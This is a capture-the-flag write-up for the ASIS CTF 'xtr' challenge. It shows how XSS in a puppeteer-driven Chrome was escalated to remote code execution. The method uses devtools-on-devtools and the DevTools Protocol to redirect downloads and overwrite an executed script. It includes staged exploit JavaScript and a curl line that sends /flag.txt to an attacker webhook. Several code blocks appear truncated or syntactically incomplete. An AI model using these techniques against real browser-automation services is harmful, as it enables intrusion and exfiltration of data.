ASIS CTF - xtr

Share on:


Writeup by: andyandpandy, Anakin

Solved by: Fr3d, c3lphie, Anakin, andyandpandy, patriksletmo, ly4k and more


This challenge took us 21 hours to solve. Only 3 out of 524 teams solved it.


The challenge included a scenario where we had arbitrary javascript execution on a website. From here we were able to utilise Chrome devtools protocol (CDP) by opening devtools inside of devtools, importing CDP and execute commands that would change the behavior of chrome. Specifically, we changed where chrome should download files onto the host, which led to overwriting the file that was being executed in a bash loop. The next iteration of this loop would then execute our malicious code and run on the server, thereby giving us remote code execution, which led to us being able to exfiltrate the flag.

Challenge Description

wow i have xss on all pages. i wonder what is stopping me from getting rce…


In this demo, headless mode has been set to false, and the docker container is run with privileges to see the actions performed when running the final script.



FROM ubuntu:latest

RUN apt-get update
RUN apt-get upgrade -y
RUN apt-get install -y curl
RUN curl -fsSL | bash -
RUN apt-get install -y ca-certificates fonts-liberation libappindicator3-1 libasound2 libatk-bridge2.0-0 libatk1.0-0 libc6 libcairo2 libcups2 libdbus-1-3 libexpat1 libfontconfig1 libgbm1 libgcc1 libglib2.0-0 libgtk-3-0 libnspr4 libnss3 libpango-1.0-0 libpangocairo-1.0-0 libstdc++6 libx11-6 libx11-xcb1 libxcb1 libxcomposite1 libxcursor1 libxdamage1 libxext6 libxfixes3 libxi6 libxrandr2 libxrender1 libxss1 libxtst6 lsb-release xdg-utils wget nodejs

RUN wget -q
RUN dpkg -i ./google-chrome-stable_current_amd64.deb
RUN rm ./google-chrome-stable_current_amd64.deb

COPY ./stuff /app
COPY ./stuff/chmodflag /
COPY ./flag.txt /flag.txt
RUN chmod 000 /flag.txt
RUN chmod +x /app/ /app/index.js /chmodflag
RUN chmod u+s /chmodflag
RUN useradd -m www
RUN chown www /app -R
USER www
#!/usr/bin/env python3
# socat TCP-LISTEN:2323,reuseaddr,fork EXEC:"./"
import os
import re
import json
import time
import subprocess

if not os.path.exists('/tmp/ips.json'):
	f = open('/tmp/ips.json','w')

ipFile = open('/tmp/ips.json','r+')
peerIp = os.environ['SOCAT_PEERADDR']
ips = {}

ips = json.loads(
if(peerIp in ips):
	if(time.time() > ips[peerIp]):
		ips[peerIp] = int(time.time())+30
		print('one try each 30 seconds')
	ips[peerIp] = int(time.time())+30

s = input('input: ')
	re.match('^[A-Za-z0-9=+/ ]+$',s) and
	s.count(' ') < 4 and
	len(s) < 3000
)'docker run --rm xtr /app/ '+s).split(' '))
for var in "$@"
    ./index.js "$var"
#!/usr/bin/env node
const puppeteer = require('puppeteer');

(async () => {
	const opts = JSON.parse(atob(process.argv[2]))

	let browser
	try {
		browser = await puppeteer.launch({
		    headless: 'chrome',
		    pipe: true,
		    args: [
		    executablePath: "/usr/bin/google-chrome",

		console.log('[+] Browser online')

		let page = await browser.newPage();
		await page.goto(opts.url.toString(), { timeout: 3000, waitUntil: 'domcontentloaded' });

		let ackCnt = Math.min(10,+opts.actions.length)
		for(let i=0;i<ackCnt;i++){
			let pages = await browser.pages()
			let idx = opts.actions[i].pageIdx
			let payload = opts.actions[i].payload.toString()

			await pages[idx].evaluate((s)=>eval(s),payload)
			await new Promise((r)=>setTimeout(r,300));
			console.log(`[+] Executed payload ${i}`)

		await page.close();
		await browser.close();
		browser = null;
    } catch(err){
    } finally {
        if (browser) await browser.close();
		console.log(`[+] Browser closed`)
#include <sys/stat.h>
#include <stdio.h>

int main(){


The first thing to notice in the dockerfile, is that the flag has had its permissions set to 000, meaning we can not just immediately read it. If that was possible, we could essentially just load in the flag via the file protocol, scrape the DOM and send it to an endpoint of our choosing. Therefore, we have to run the chmodflag binary, which has been compiled from the code found inside of chmodflag.c. Then we will be able to read the flag. Furthermore, user www owns /app recursively. As the directory of /app has not had its permissions changed, we can read and write from this folder as www.

The entrypoint for our input is through the script, as that file gets exposed by socat on a predefined port. The first part of the code is to prevent DoS-attacks from being performed onto the server, by restricting you to only perform one try, for every 30 seconds. If we look past this part we see an assertion statement, that checks if the payload matches a regex pattern, basically restricting the payload to only include characters found in the base64 charset. Additionally, it checks if the payload only has 3 spaces or less and if the payload is less than 3000 characters long. Hence, the limitations of our payload are max 2999 characters, max 3 spaces and that it has to consist of characters located in the base64 charset.

If we get past this assertion statement, the script will run a docker container, executing with our payload appended. The script will have the payload split at the spaces and loop over each item, running the index.js script with each separate base64 encoded payload. It is noteworthy, that the index.js script is not explicitly invoked with node in the bash script, but instead as an executable that has a shebang line pointing to wherever node is found in PATH.

Gaining CSRF/XSS

The index.js file decodes and parses the payload as JSON-objects, and loads the latest version of Google Chrome with puppeteer. It then visits a provided URL, and performs any JavaScript actions that we provide in the JSON-object. This means that we have arbitrary XSS, on any domain. The goal is now to get RCE, run the chmodflag binary and extract the flag.

How do we get RCE, when we are stuck in browser context?
Since we are able to run several payloads, we can on the first iteration attempt to initially download a malicious file that overrides index.js, which will then be run on the second iteration giving us RCE.

The first objective would then be, to be capable of choosing the location of where downloaded files will be stored. Doing some preliminary tests it turns out, that downloaded files by default are stored in /home/www/Downloads. This is slightly unfortunate, as we will have to have it point to /app, to overwrite files used by the application.

Chrome DevTools Protocol (CDP) to the rescue

The Chrome DevTools Protocol (CDP) is an API that allows for instrumentation of different functionalities and components of Chrome/Chromium-based browsers, and is available in Chrome/Chromium-based browsers. This is interesting, as puppeteer is based on Chrome running in headless mode, with communication and actions to Chrome happening over CDP.

You can find more information here regarding CDP.

Why is this relevant for us?
It is relevant as we can take advange of CDP, to change where Chrome will store downloaded files.

Normally when using puppeteer, it will expose access to CDP for debugging purposes on a random local port, which we can interact with. Writeups using this to get a hold of CDP exists, in which they first either know or bruteforce the port that CDP gets exposed on, and then abuse it to do black magic. In this case, though, puppeteer is launched with the pipe: true flag, essentially only allowing external interaction with CDP through a local pipe to the Chrome process, and thereby eliminating the solution of accessing a network port. However, there are still ways to interact with CDP.

To quote directly from the page:

Alternatively, you can execute commands from the DevTools console. First, open devtools-on-devtools, then within the inner DevTools window, use Main.MainImpl.sendOverProtocol() in the console:

let Main = await import('./devtools-frontend/front_end/entrypoints/main/main.js'); // or './entrypoints/main/main.js' or './main/main.js' depending on the browser version
await Main.MainImpl.sendOverProtocol('Emulation.setDeviceMetricsOverride', {
  mobile: true,
  width: 412,
  height: 732,
  deviceScaleFactor: 2.625,

const data = await Main.MainImpl.sendOverProtocol("Page.captureScreenshot");

Note that this method is basically reaching into internals of the DevTools source code and there is no guarantee that it’d continue to work as DevTools evolves.

Our goal is now to open devtools, then open devtools in the devtools window, and import the above main.js script, with the intent that we can interract with CDP and accordingly change the behavior of Chrome. Specifically we want to change where downloaded files are stored on the host, and we can do this through Page.setDownloadBehavior.

Manually obtaining access to CDP

How do we easily open devtools in Chrome, without having obvious ways of using E.g. Keyboards to press F12 or similar?
We can use the chrome://inspect/#pages built-in page, that allows us to click on inspect links to various websites. When we were running our exploit, we ended up having devtools in devtools in devtools, which meant we had to smuggle some of the commands through an additional runtime.Evaluate.

The below code shows how we constructed our base64 encoded payload:

import subprocess
from base64 import b64encode
import json

stage1 = open("stage1.js").read()
stage2 = open("stage2.js").read()

actions = [
        'pageIdx': "1",
        'payload': stage1
        'pageIdx': "2",
        'payload': stage2

k = {
    'url': 'chrome://inspect/#pages',
    'actions': actions

s = b64encode(json.dumps(k).encode()).decode()

function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));

(async () => {
await sleep(1000);
await sleep(1000);
await sleep(1000);
function sleep(ms) {
    return new Promise(resolve => setTimeout(resolve, ms));

(async () => {
    const payload = `
    function sleep(ms) {
        return new Promise(resolve => setTimeout(resolve, ms));

    (async () => {
    let Main = await import('./devtools-frontend/front_end/entrypoints/main/main.js');
    await sleep(1000);

    console.log("Setting download behavior");

    Main.MainImpl.sendOverProtocol("Page.setDownloadBehavior", {
    "behavior": "allow",
    "downloadPath": '/app'

    await sleep(1000);
    console.log("Opening chrome://download-internals");
    Main.MainImpl.sendOverProtocol("Page.navigate", {url: "chrome://download-internals"});

    await sleep(1000);
    console.log("Starting download");
    await Main.MainImpl.sendOverProtocol("Runtime.evaluate", {expression: "var x = document.getElementById('download-url');x.value = '<url>/index.js';var y = document.getElementById('start-download');"});

    await sleep(3000);
    await sleep(3000);
    var Main = await import('./devtools-frontend/front_end/entrypoints/main/main.js');
    await sleep(2000);
    await Main.MainImpl.sendOverProtocol("Runtime.evaluate", {expression: payload})
    await sleep(3000);
curl <webhook>/?flag=$(cat /flag.txt | base64)

Executing the exploit

First and foremost, we open puppeteer on the URL chrome://inspect/#pages. Then, stage1 is executed and we click on the inspect span.action link, click on the other tab in the navigation menu and then inspect the devtools in devtools. This gives us devtools in devtools, inside devtools.

Stage2 is run with async, allowing us to make use of SendOverProtocol to communicate with CDP, and to call sleep. Stage2 imports main.js of Chrome DevTools, allowing us access to the method MainImpl.SendOverProtocol and giving us an entry to CDP.

Main.MainImpl.sendOverProtocol("Page.setDownloadBehavior", {
    "behavior": "allow",
    "downloadPath": '/app'

Calling Page.setDownloadBehavior sets the download path for the currently running Chrome, which will now allow all download requests and place the files inside of /app.

Afterwards we navigate to chrome://download-internals, and do a combination of changing the URL-to-download field to the location of our poisoned index.js file, and click the “Download” button to initiate the download and consequently overwrite index.js. On the next payload iteration the poisoned index.js file will be run as a bash script, executing the chmodflag binary and exfiltrating the flag to an endpoint that we control. Throughout the script we have a handful of time delays, sleeps, to ensure everything has enough time to get executed, fulfilled and completed.

Finally, running the exploit gets us the flag:

Flag: ASIS{node+chrome+xss-lmao}